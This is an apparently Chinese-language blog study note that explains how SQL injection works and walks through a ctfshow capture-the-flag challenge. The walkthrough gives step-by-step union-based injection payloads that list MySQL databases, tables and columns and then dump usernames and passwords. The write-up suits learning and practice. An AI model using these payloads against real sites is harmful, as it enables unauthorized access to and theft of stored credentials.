
  <!DOCTYPE html>
  <html lang="en"  >
  <head>
  <meta charset="utf-8">
  

  

  

  
  <script>window.icon_font = '4552607_tq6stt6tcg';window.clipboard_tips = {"success":"复制成功(*^▽^*)","fail":"复制失败 (ﾟ⊿ﾟ)ﾂ"};</script>
  
  
  <title>
    
    Hexo
  </title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin><link rel="preload" as="style" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic%7CNoto%20Serif%20SC:400,400italic,700,700italic%7CUbuntu%20Mono:400,400italic,700,700italic&display=swap"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic%7CNoto%20Serif%20SC:400,400italic,700,700italic%7CUbuntu%20Mono:400,400italic,700,700italic&display=swap" media="print" onload="this.media&#x3D;&#39;all&#39;">
  
    <link rel="preload" href="//at.alicdn.com/t/c/font_4552607_tq6stt6tcg.woff2" as="font" type="font/woff2" crossorigin="anonymous">
  
  
<link rel="stylesheet" href="/css/loader.css">

  <meta name="description" content="什么是sql注入（原理）在数据交互的过程中，前端的数据传递到后端处理时没有做好判断，导致传入时的数据拼接到了失去了注入语句，被当作sql语句执行  常用的拼接符号： ‘ ‘,””, (“”) ,  – - 常用的连接词 union and or  sql注入是基于数据库语言来的在MySQL中通常会有一个数据库的存在，它储存了所有的库，表，内容，字段名称为：information_schema  其">
<meta property="og:type" content="article">
<meta property="og:title" content="Hexo">
<meta property="og:url" content="http://example.com/2024/07/22/7.22%20sql%E6%B3%A8%E5%85%A5/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="什么是sql注入（原理）在数据交互的过程中，前端的数据传递到后端处理时没有做好判断，导致传入时的数据拼接到了失去了注入语句，被当作sql语句执行  常用的拼接符号： ‘ ‘,””, (“”) ,  – - 常用的连接词 union and or  sql注入是基于数据库语言来的在MySQL中通常会有一个数据库的存在，它储存了所有的库，表，内容，字段名称为：information_schema  其">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2024/png/46252388/1721646726767-404d8dcb-3079-4d3b-bb0b-846725f1546a.png#averageHue=%23131313&clientId=uf72f2e4d-74fc-4&from=paste&height=228&id=uc130603f&originHeight=342&originWidth=934&originalType=binary&ratio=1.5&rotation=0&showTitle=false&size=19035&status=done&style=none&taskId=uf7d9e147-08a4-4d25-9e1f-fd73c8c3ee6&title=&width=622.6666666666666">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2024/png/46252388/1721646749250-fbff94f8-a700-474e-9ff2-b559a95f7c5b.png#averageHue=%23121212&clientId=uf72f2e4d-74fc-4&from=paste&height=283&id=ubfad3bdd&originHeight=425&originWidth=1460&originalType=binary&ratio=1.5&rotation=0&showTitle=false&size=32472&status=done&style=none&taskId=u8532f613-341b-41c0-8ae3-cb99ef8c8bf&title=&width=973.3333333333334">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2024/png/46252388/1721647118726-57b588c0-18ca-45d7-88d8-7623ef0098af.png#averageHue=%23111111&clientId=uf72f2e4d-74fc-4&from=paste&height=151&id=u742366cc&originHeight=226&originWidth=1665&originalType=binary&ratio=1.5&rotation=0&showTitle=false&size=13974&status=done&style=none&taskId=u79d3f6ec-8b14-4a5e-83c0-5c2db4fcc47&title=&width=1110">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2024/png/46252388/1721647296376-277cecf9-ba71-4ee2-8b5b-cae00a548b3a.png#averageHue=%23141414&clientId=uf72f2e4d-74fc-4&from=paste&height=143&id=u0750434f&originHeight=214&originWidth=1069&originalType=binary&ratio=1.5&rotation=0&showTitle=false&size=41288&status=done&style=none&taskId=u008fc7ea-05db-4bb9-a0d3-7a4c1e9e412&title=&width=712.6666666666666">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2024/png/46252388/1721647594642-6389e0f7-1656-4903-bcf4-d574c40638a2.png#averageHue=%23f4f3f3&clientId=uf72f2e4d-74fc-4&from=paste&height=303&id=ua97ac39f&originHeight=503&originWidth=1077&originalType=binary&ratio=1.5&rotation=0&showTitle=false&size=20666&status=done&style=none&taskId=u854e7c35-c3d5-4274-b085-8b912920291&title=&width=649.3333740234375">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2024/png/46252388/1721647918355-c6a6961a-b468-4bcb-bd0f-85392917d8ba.png#averageHue=%23fbfbfb&clientId=uf72f2e4d-74fc-4&from=paste&height=71&id=u52c7a2c8&originHeight=311&originWidth=1315&originalType=binary&ratio=1.5&rotation=0&showTitle=false&size=9598&status=done&style=none&taskId=ub56bd8cd-84c7-4c00-972a-a4263052974&title=&width=301.3333435058594">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2024/png/46252388/1721647939825-cdd71ab7-c14a-4514-bef2-8abcfecf5d2e.png#averageHue=%23fbfafa&clientId=uf72f2e4d-74fc-4&from=paste&height=52&id=u9a243129&originHeight=248&originWidth=1473&originalType=binary&ratio=1.5&rotation=0&showTitle=false&size=12934&status=done&style=none&taskId=u20259d66-2723-49ea-81f6-83921d7ed30&title=&width=309.3333435058594">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2024/png/46252388/1721648040954-72602b92-770c-4eb1-86d3-b671b27edfe1.png#averageHue=%23f9f8f7&clientId=uf72f2e4d-74fc-4&from=paste&height=188&id=u5410ce1a&originHeight=282&originWidth=961&originalType=binary&ratio=1.5&rotation=0&showTitle=false&size=22339&status=done&style=none&taskId=ucc09d87b-56c8-4b2c-b2e1-926e3d22af0&title=&width=640.6666666666666">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2024/png/46252388/1721648315639-f493a709-2e05-46a2-86cb-268ac18bcdee.png#averageHue=%23f9f9f8&clientId=uf72f2e4d-74fc-4&from=paste&height=173&id=u0ed5d5e8&originHeight=259&originWidth=997&originalType=binary&ratio=1.5&rotation=0&showTitle=false&size=18820&status=done&style=none&taskId=uc4a8b485-6647-460f-9c99-1956a894cc3&title=&width=664.6666666666666">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2024/png/46252388/1721648373796-f5226a37-4a10-4934-9836-f3b7d97b4957.png#averageHue=%23f9f8f8&clientId=uf72f2e4d-74fc-4&from=paste&height=165&id=u4059ea54&originHeight=247&originWidth=960&originalType=binary&ratio=1.5&rotation=0&showTitle=false&size=16986&status=done&style=none&taskId=ucde5c5f0-d5a6-4276-8222-63e435a8c69&title=&width=640">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2024/png/46252388/1721648428572-f1081404-2387-48e0-8aa7-f6718213de03.png#averageHue=%23f8f7f7&clientId=uf72f2e4d-74fc-4&from=paste&height=203&id=u664d4990&originHeight=305&originWidth=1029&originalType=binary&ratio=1.5&rotation=0&showTitle=false&size=30284&status=done&style=none&taskId=u653cb334-e919-4e8b-b121-60ec87568a8&title=&width=686">
<meta property="article:published_time" content="2024-07-22T11:55:35.629Z">
<meta property="article:modified_time" content="2024-07-22T11:55:03.833Z">
<meta property="article:author" content="muoubenou">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.nlark.com/yuque/0/2024/png/46252388/1721646726767-404d8dcb-3079-4d3b-bb0b-846725f1546a.png#averageHue=%23131313&clientId=uf72f2e4d-74fc-4&from=paste&height=228&id=uc130603f&originHeight=342&originWidth=934&originalType=binary&ratio=1.5&rotation=0&showTitle=false&size=19035&status=done&style=none&taskId=uf7d9e147-08a4-4d25-9e1f-fd73c8c3ee6&title=&width=622.6666666666666">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/images/favicon.ico">
  
  
<link rel="stylesheet" href="/css/style.css">

  
<link rel="stylesheet" href="https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.css">

  
  
  
  
<script src="https://npm.webcache.cn/pace-js@1.2.4/pace.min.js"></script>

  
    
<link rel="stylesheet" href="https://npm.webcache.cn/wowjs@1.1.3/css/libs/animate.css">

    
<script src="https://npm.webcache.cn/wowjs@1.1.3/dist/wow.min.js"></script>

    <script>
      new WOW({
        offset: 0,
        mobile: true,
        live: false
      }).init();
    </script>
  
  
    <script src="/sw.js"></script>
  
<meta name="generator" content="Hexo 7.3.0"></head>

  <body>
    
  <div id='loader'>
    <div class="loading-left-bg loading-bg"></div>
    <div class="loading-right-bg loading-bg"></div>
    <div class="spinner-box">
      <div class="loading-taichi">
        <svg width="150" height="150" viewBox="0 0 1024 1024" class="icon" version="1.1" xmlns="https://www.w3.org/2000/svg" shape-rendering="geometricPrecision">
          <path d="M303.5 432A80 80 0 0 1 291.5 592A80 80 0 0 1 303.5 432z" fill="#ff6e6b" />
          <path d="M512 65A447 447 0 0 1 512 959L512 929A417 417 0 0 0 512 95A417 417 0 0 0 512 929L512 959A447 447 0 0 1 512 65z" fill="#fd0d00" />
          <path d="M512 95A417 417 0 0 1 929 512A208.5 208.5 0 0 1 720.5 720.5L720.5 592A80 80 0 0 0 720.5 432A80 80 0 0 0 720.5 592L720.5 720.5A208.5 208.5 0 0 1 512 512A208.5 208.5 0 0 0 303.5 303.5A208.5 208.5 0 0 0 95 512A417 417 0 0 1 512 95" fill="#fd0d00" />
        </svg>
      </div>
      <div class="loading-word">少女祈祷中...</div>
    </div>
  </div>
  </div>
  <script>
    var time = null;
    var startLoading = () => {
      time = Date.now();
      document.getElementById('loader').classList.remove("loading");
    }
    var endLoading = () => {
      if (!time) {
        document.body.style.overflow = 'auto';
        document.getElementById('loader').classList.add("loading");
      } else {
        if (Date.now() - time > 500) {
          time = null;
          document.body.style.overflow = 'auto';
          document.getElementById('loader').classList.add("loading");
        } else {
          setTimeout(endLoading, 500 - (Date.now() - time));
          time = null;
        }
      }
    }
    window.addEventListener('DOMContentLoaded', endLoading);
    document.getElementById('loader').addEventListener('click', endLoading);
  </script>

<div id="copy-tooltip" style="pointer-events: none; opacity: 0; transition: all 0.2s ease; position: fixed;top: 50%;left: 50%;z-index: 999;transform: translate(-50%, -50%);color: white;background: rgba(0, 0, 0, 0.5);padding: 10px 15px;border-radius: 10px;">
</div>

    <div id="container">
      <div id="wrap">
        <div id="header-nav">
  <nav id="main-nav">
    
      <span class="main-nav-link-wrap">
        <span class="main-nav-icon"></span>
        <a class="main-nav-link" href="/">Home</a>
      </span>
    
      <span class="main-nav-link-wrap">
        <span class="main-nav-icon"></span>
        <a class="main-nav-link" href="/archives">Archives</a>
      </span>
    
      <span class="main-nav-link-wrap">
        <span class="main-nav-icon"></span>
        <a class="main-nav-link" href="/about">About</a>
      </span>
    
      <span class="main-nav-link-wrap">
        <span class="main-nav-icon"></span>
        <a class="main-nav-link" href="/friend">Friend</a>
      </span>
    
    <a id="main-nav-toggle" class="nav-icon"></a>
  </nav>
  <nav id="sub-nav">
    
      <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
    
    
    
  </nav>
</div>
<header id="header">
  
    
      <img fetchpriority="high" src="/images/banner.webp" alt="">
    
  
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <div id="logo-wrap">
        
          
          
            <a href="/" id="logo">
              <h1>Hexo</h1>
            </a>
          
        
      </div>
      
        
        <h2 id="subtitle-wrap">
          
        </h2>
      
    </div>
  </div>
</header>

        <div id="content" class="outer">
          
          <section id="main"><article id="post-7.22 sql注入" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-inner">
    <div class="article-meta">
      <div class="article-date wow slideInLeft">
  <a href="/2024/07/22/7.22%20sql%E6%B3%A8%E5%85%A5/" class="article-date-link">
    <time datetime="2024-07-22T11:55:35.629Z" itemprop="datePublished">2024-07-22</time>
  </a>
</div>

      

    </div>
    <div class="hr-line"></div>
    

    <div class="e-content article-entry" itemprop="articleBody">
      
        <p><strong>什么是sql注入（</strong>原理<strong>）</strong><br />在数据交互的过程中，前端的数据传递到后端处理时没有做好判断，导致传入时的数据拼接<br />到了失去了注入语句，被当作sql语句执行</p>
<ol>
<li>常用的拼接符号： ‘ ‘,””, (“”) ,  – -</li>
<li>常用的连接词 union and or</li>
</ol>
<p>sql注入是基于数据库语言来的<br />在MySQL中通常会有一个数据库的存在，它储存了所有的库，表，内容，字段<br /><strong>名称为：information_schema  其中：</strong><br />schemata 为存储 数据库的表 所以获取全部表的内容的sql语句为：<br />select  schema_name from information_schema.schemata;<br /><img src="https://cdn.nlark.com/yuque/0/2024/png/46252388/1721646726767-404d8dcb-3079-4d3b-bb0b-846725f1546a.png#averageHue=%23131313&clientId=uf72f2e4d-74fc-4&from=paste&height=228&id=uc130603f&originHeight=342&originWidth=934&originalType=binary&ratio=1.5&rotation=0&showTitle=false&size=19035&status=done&style=none&taskId=uf7d9e147-08a4-4d25-9e1f-fd73c8c3ee6&title=&width=622.6666666666666" alt="image.png"><br />tables 为储存 表  为了获取相应库的所有表 有以下语句<br />select table_name from information_schema.tables where table_schema&#x3D;’你想查询的库’;<br /><img src="https://cdn.nlark.com/yuque/0/2024/png/46252388/1721646749250-fbff94f8-a700-474e-9ff2-b559a95f7c5b.png#averageHue=%23121212&clientId=uf72f2e4d-74fc-4&from=paste&height=283&id=ubfad3bdd&originHeight=425&originWidth=1460&originalType=binary&ratio=1.5&rotation=0&showTitle=false&size=32472&status=done&style=none&taskId=u8532f613-341b-41c0-8ae3-cb99ef8c8bf&title=&width=973.3333333333334" alt="image.png"><br />columns 为字段储存的地方 ，查询你想查的特定字段语法为<br />select column_name from information_schema.columns where table_schema&#x3D;’你想查的字段的库’ and table_name&#x3D;’你想查的字段所在的表’;<br /><img src="https://cdn.nlark.com/yuque/0/2024/png/46252388/1721647118726-57b588c0-18ca-45d7-88d8-7623ef0098af.png#averageHue=%23111111&clientId=uf72f2e4d-74fc-4&from=paste&height=151&id=u742366cc&originHeight=226&originWidth=1665&originalType=binary&ratio=1.5&rotation=0&showTitle=false&size=13974&status=done&style=none&taskId=u79d3f6ec-8b14-4a5e-83c0-5c2db4fcc47&title=&width=1110" alt="image.png"></p>
<p>union的使用：<br />union的意思为拼接，可以在后面输入新的查询或者其他语句，他会自动显示到前一语句的下面<br /><strong>注意：union的后的语句必须与它前面的语句有一样的格式</strong><br /><img src="https://cdn.nlark.com/yuque/0/2024/png/46252388/1721647296376-277cecf9-ba71-4ee2-8b5b-cae00a548b3a.png#averageHue=%23141414&clientId=uf72f2e4d-74fc-4&from=paste&height=143&id=u0750434f&originHeight=214&originWidth=1069&originalType=binary&ratio=1.5&rotation=0&showTitle=false&size=41288&status=done&style=none&taskId=u008fc7ea-05db-4bb9-a0d3-7a4c1e9e412&title=&width=712.6666666666666" alt="image.png"><br />三列跟三列<br />为了了解前一行的列数，我们可以通过 order by +数字的方式，如果加到一定数字时页面报错了那么这个数减一就是列数。</p>
<p>下面是sql注入的实战：<br />题目<br /><img src="https://cdn.nlark.com/yuque/0/2024/png/46252388/1721647594642-6389e0f7-1656-4903-bcf4-d574c40638a2.png#averageHue=%23f4f3f3&clientId=uf72f2e4d-74fc-4&from=paste&height=303&id=ua97ac39f&originHeight=503&originWidth=1077&originalType=binary&ratio=1.5&rotation=0&showTitle=false&size=20666&status=done&style=none&taskId=u854e7c35-c3d5-4274-b085-8b912920291&title=&width=649.3333740234375" alt="image.png"><br />解法：<br />首先看他的查询语句，发现为<br />select username,password from ctfshow_user2 where username !&#x3D;’flag’ and id &#x3D; ‘’ limit 1;<br />把中间变量删了是因为这个就是我们输入框输的。<br />然后我们输入这个语句 :         1’ order by 2 – -<br /><img src="https://cdn.nlark.com/yuque/0/2024/png/46252388/1721647918355-c6a6961a-b468-4bcb-bd0f-85392917d8ba.png#averageHue=%23fbfbfb&clientId=uf72f2e4d-74fc-4&from=paste&height=71&id=u52c7a2c8&originHeight=311&originWidth=1315&originalType=binary&ratio=1.5&rotation=0&showTitle=false&size=9598&status=done&style=none&taskId=ub56bd8cd-84c7-4c00-972a-a4263052974&title=&width=301.3333435058594" alt="image.png"><img src="https://cdn.nlark.com/yuque/0/2024/png/46252388/1721647939825-cdd71ab7-c14a-4514-bef2-8abcfecf5d2e.png#averageHue=%23fbfafa&clientId=uf72f2e4d-74fc-4&from=paste&height=52&id=u9a243129&originHeight=248&originWidth=1473&originalType=binary&ratio=1.5&rotation=0&showTitle=false&size=12934&status=done&style=none&taskId=u20259d66-2723-49ea-81f6-83921d7ed30&title=&width=309.3333435058594" alt="image.png"><br />所以列数为2<br />之后输入：1’  union select 1,group_concat(schema_name) from information_schema.schemata  – -<br />查询所有的数据库<br />select后面的1 是凑出来的列数  group_concat()函数是将一组数据进行合并并且返回字符串<br /><img src="https://cdn.nlark.com/yuque/0/2024/png/46252388/1721648040954-72602b92-770c-4eb1-86d3-b671b27edfe1.png#averageHue=%23f9f8f7&clientId=uf72f2e4d-74fc-4&from=paste&height=188&id=u5410ce1a&originHeight=282&originWidth=961&originalType=binary&ratio=1.5&rotation=0&showTitle=false&size=22339&status=done&style=none&taskId=ucc09d87b-56c8-4b2c-b2e1-926e3d22af0&title=&width=640.6666666666666" alt="image.png"><br />我们可以看到里面有特殊的数据库：ctfshow_web<br />下一步我们查看它的表：<br />1’ union select 1,group_concat(table_name) from information_schema.tables where table_schema&#x3D;’ctfshow_web’ – -<br /><img src="https://cdn.nlark.com/yuque/0/2024/png/46252388/1721648315639-f493a709-2e05-46a2-86cb-268ac18bcdee.png#averageHue=%23f9f9f8&clientId=uf72f2e4d-74fc-4&from=paste&height=173&id=u0ed5d5e8&originHeight=259&originWidth=997&originalType=binary&ratio=1.5&rotation=0&showTitle=false&size=18820&status=done&style=none&taskId=uc4a8b485-6647-460f-9c99-1956a894cc3&title=&width=664.6666666666666" alt="image.png"><br />之后我们查看这两个字段里面的内容：<br />1’ union select 1,group_concat(column_name) from information_schema.columns where table_schema&#x3D;’ctfshow_web’ and table_name&#x3D;’ctfshow_user’ – -<br /><img src="https://cdn.nlark.com/yuque/0/2024/png/46252388/1721648373796-f5226a37-4a10-4934-9836-f3b7d97b4957.png#averageHue=%23f9f8f8&clientId=uf72f2e4d-74fc-4&from=paste&height=165&id=u4059ea54&originHeight=247&originWidth=960&originalType=binary&ratio=1.5&rotation=0&showTitle=false&size=16986&status=done&style=none&taskId=ucde5c5f0-d5a6-4276-8222-63e435a8c69&title=&width=640" alt="image.png"><br />看它里面的内容：<br />1’ union select 1,group_concat(id,username,password) from ctfshow_web.ctfshow_user2 – -<br /><img src="https://cdn.nlark.com/yuque/0/2024/png/46252388/1721648428572-f1081404-2387-48e0-8aa7-f6718213de03.png#averageHue=%23f8f7f7&clientId=uf72f2e4d-74fc-4&from=paste&height=203&id=u664d4990&originHeight=305&originWidth=1029&originalType=binary&ratio=1.5&rotation=0&showTitle=false&size=30284&status=done&style=none&taskId=u653cb334-e919-4e8b-b121-60ec87568a8&title=&width=686" alt="image.png"><br />得到密钥flag</p>
<p>拓展：<br />ascii()   &#x2F;&#x2F;把字符转换为数字<br />database() &#x2F;&#x2F;内置函数，获取当前数据库名<br />user()     &#x2F;&#x2F;获取当前的使用者名<br />version()  &#x2F;&#x2F;获取版本号、<br />substr(被截取的字符，开始截取的位置，截至字符串长度)   &#x2F;&#x2F;括号内是字符串，截取字符</p>

      
    </div>
    <footer class="article-footer">
      
      
      
      
      
      
      

    </footer>
  </div>
  
    
  <nav id="article-nav" class="wow fadeInUp">
    
      <div class="article-nav-link-wrap article-nav-link-left">
        
          
          
            <img data-src="/images/banner.webp" data-sizes="auto" alt="" class="lazyload">
          
        
        <a href="/2024/07/30/7.30%20%E6%96%87%E4%BB%B6%E4%BC%A0%E8%BE%93%E6%BC%8F%E6%B4%9E/"></a>
        <div class="article-nav-caption">Newer</div>
        <h3 class="article-nav-title">
          
            (no title)
          
        </h3>
      </div>
    
    
    <div class="article-nav-link-wrap article-nav-link-right">
      
        
        
          <img data-src="/images/banner.webp" data-sizes="auto" alt="" class="lazyload">
        
      
      <a href="/2024/07/22/7.21%207.22%20%E5%BC%B1%E5%8F%A3%E4%BB%A4%E6%8C%96%E6%8E%98/"></a>
      <div class="article-nav-caption">Older</div>
      <h3 class="article-nav-title">
        
          (no title)
        
      </h3>
    </div>
    
  </nav>


  
</article>






</section>
          
            <aside id="sidebar">
  <div class="sidebar-wrap wow fadeInRight wrap-sticky">
    
      <div class="sidebar-toc-sidebar"><div class="sidebar-toc">
  <h3 class="toc-title">Contents</h3>
  <div class="sidebar-toc-wrapper toc-div-class" >
      
        
      
  </div>
</div>
</div>
      <div class="sidebar-common-sidebar hidden"><div class="sidebar-author">
  <img data-src="/avatar/avatar.webp" data-sizes="auto" alt="muoubenou" class="lazyload">
  <div class="sidebar-author-name">muoubenou</div>
  <div class="sidebar-description"></div>
</div>
<div class="sidebar-state">
  <div class="sidebar-state-article">
    <div>Posts</div>
    <div class="sidebar-state-number">9</div>
  </div>
  <div class="sidebar-state-category">
    <div>Categories</div>
    <div class="sidebar-state-number">0</div>
  </div>
  <div class="sidebar-state-tag">
    <div>Tags</div>
    <div class="sidebar-state-number">0</div>
  </div>
</div>
<div class="sidebar-social">
  
</div>
<div class="sidebar-menu">
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/" aria-label="Home"></a>
      <span class="sidebar-menu-icon"></span>
      <div class="sidebar-menu-link">Home</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/archives" aria-label="Archives"></a>
      <span class="sidebar-menu-icon"></span>
      <div class="sidebar-menu-link">Archives</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/about" aria-label="About"></a>
      <span class="sidebar-menu-icon"></span>
      <div class="sidebar-menu-link">About</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/friend" aria-label="Friend"></a>
      <span class="sidebar-menu-icon"></span>
      <div class="sidebar-menu-link">Friend</div>
    </div>
  
</div>
</div>
    
    
      <div class="sidebar-btn-wrapper" style="position:static">
        <div class="sidebar-toc-btn current"></div>
        <div class="sidebar-common-btn"></div>
      </div>
    
  </div>

  
</aside>

          
        </div>
        <footer id="footer" class="wow fadeInUp">
  <div style="width: 100%; overflow: hidden">
    <div class="footer-line"></div>
  </div>
  <div class="outer">
    <div id="footer-info" class="inner">
      
      <div>
        <span class="icon-copyright"></span>
        2020-2024
        <span class="footer-info-sep"></span>
        muoubenou
      </div>
      
        <div>
          Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>&nbsp;
          Theme.<a href="https://github.com/D-Sketon/hexo-theme-reimu" target="_blank">Reimu</a>
        </div>
      
      
        <div>
          <span class="icon-brush"></span>
          19.3k
          &nbsp;|&nbsp;
          <span class="icon-coffee"></span>
          01:29
        </div>
      
      
        <div>
          <span class="icon-eye"></span>
          <span id="busuanzi_container_site_pv">Number of visits&nbsp;<span id="busuanzi_value_site_pv"></span></span>
          &nbsp;|&nbsp;
          <span class="icon-user"></span>
          <span id="busuanzi_container_site_uv">Number of visitors&nbsp;<span id="busuanzi_value_site_uv"></span></span>
        </div>
      
    </div>
  </div>
</footer>

        <div class="sidebar-top">
          <img src="/images/taichi.png" height="50" width="50" alt="backtop" />
          <div class="arrow-up"></div>
        </div>
        <div id="mask"></div>
      </div>
      <nav id="mobile-nav">
  <div class="sidebar-wrap">
    
      <div class="sidebar-toc-sidebar"><div class="sidebar-toc">
  <h3 class="toc-title">Contents</h3>
  <div class="sidebar-toc-wrapper toc-div-class" >
      
        
      
  </div>
</div>
</div>
      <div class="sidebar-common-sidebar hidden"><div class="sidebar-author">
  <img data-src="/avatar/avatar.webp" data-sizes="auto" alt="muoubenou" class="lazyload">
  <div class="sidebar-author-name">muoubenou</div>
  <div class="sidebar-description"></div>
</div>
<div class="sidebar-state">
  <div class="sidebar-state-article">
    <div>Posts</div>
    <div class="sidebar-state-number">9</div>
  </div>
  <div class="sidebar-state-category">
    <div>Categories</div>
    <div class="sidebar-state-number">0</div>
  </div>
  <div class="sidebar-state-tag">
    <div>Tags</div>
    <div class="sidebar-state-number">0</div>
  </div>
</div>
<div class="sidebar-social">
  
</div>
<div class="sidebar-menu">
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/" aria-label="Home"></a>
      <span class="sidebar-menu-icon"></span>
      <div class="sidebar-menu-link">Home</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/archives" aria-label="Archives"></a>
      <span class="sidebar-menu-icon"></span>
      <div class="sidebar-menu-link">Archives</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/about" aria-label="About"></a>
      <span class="sidebar-menu-icon"></span>
      <div class="sidebar-menu-link">About</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/friend" aria-label="Friend"></a>
      <span class="sidebar-menu-icon"></span>
      <div class="sidebar-menu-link">Friend</div>
    </div>
  
</div>
</div>
    
  </div>
  
    <div class="sidebar-btn-wrapper">
      <div class="sidebar-toc-btn current"></div>
      <div class="sidebar-common-btn"></div>
    </div>
  
</nav>

    </div>
    <div class="site-search">
      <div class="reimu-popup popup">
        <div class="reimu-search">
          <span class="reimu-search-input-icon"></span>
          <div class="reimu-search-input" id="reimu-search-input"></div>
        </div>
        <div class="reimu-results">
          <div id="reimu-stats"></div>
          <div id="reimu-hits"></div>
          <div id="reimu-pagination" class="reimu-pagination"></div>
        </div>
        <span class="popup-btn-close"></span>
      </div>
    </div>
    
<script src="https://npm.webcache.cn/lazysizes@5.3.2/lazysizes.min.js"></script>


<script src="https://npm.webcache.cn/clipboard@2.0.11/dist/clipboard.min.js"></script>



<script src="/js/script.js"></script>



<script src="/js/pjax_script.js" data-pjax></script>


<script type="module" data-pjax>
  import PhotoSwipeLightbox from "https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe-lightbox.esm.js";
  
  const pswp = () => {
    if (_$$('.article-entry a.article-gallery-item').length > 0) {
      new PhotoSwipeLightbox({
        gallery: '.article-entry',
        children: 'a.article-gallery-item',
        pswpModule: () => import("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.esm.js")
      }).init();
    }
    if(_$$('.article-gallery a.article-gallery-item').length > 0) {
      new PhotoSwipeLightbox({
        gallery: '.article-gallery',
        children: 'a.article-gallery-item',
        pswpModule: () => import("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.esm.js")
      }).init();
    }
    window.lightboxStatus = 'done';
    window.removeEventListener('lightbox:ready', pswp);
  }
  if(window.lightboxStatus === 'ready') {
    pswp()
  } else {
    window.addEventListener('lightbox:ready', pswp);
  }
</script>
















  
<script src="https://npm.webcache.cn/mouse-firework@0.0.4/dist/index.umd.js"></script>

  <script>
    firework(JSON.parse('{"excludeElements":["a","button"],"particles":[{"shape":"circle","move":["emit"],"easing":"easeOutExpo","colors":["#ff5252","#ff7c7c","#ffafaf","#ffd0d0"],"number":20,"duration":[1200,1800],"shapeOptions":{"radius":[16,32],"alpha":[0.3,0.5]}},{"shape":"circle","move":["diffuse"],"easing":"easeOutExpo","colors":["#ff0000"],"number":1,"duration":[1200,1800],"shapeOptions":{"radius":20,"alpha":[0.2,0.5],"lineWidth":6}}]}'))
  </script>






<div id="lazy-script">
  <div>
    
  </div>
</div>


  <script>
    console.log(String.raw`%c 
 ______     ______     __     __    __     __  __    
/\  == \   /\  ___\   /\ \   /\ "-./  \   /\ \/\ \   
\ \  __<   \ \  __\   \ \ \  \ \ \-./\ \  \ \ \_\ \  
 \ \_\ \_\  \ \_____\  \ \_\  \ \_\ \ \_\  \ \_____\ 
  \/_/ /_/   \/_____/   \/_/   \/_/  \/_/   \/_____/ 
                                                  
`,'color: #ff5252;')
    console.log('%c Theme.Reimu v' + '0.2.0' + ' %c https://github.com/D-Sketon/hexo-theme-reimu ', 'color: white; background: #ff5252; padding:5px 0;', 'padding:4px;border:1px solid #ff5252;')
  </script>
  


  
<script src="https://npm.webcache.cn/busuanzi@2.3.0/bsz.pure.mini.js" async></script>


  <!-- hexo injector body_end start -->
<script src="/js/insert_highlight.js" data-pjax></script>
<!-- hexo injector body_end end --></body>
  </html>

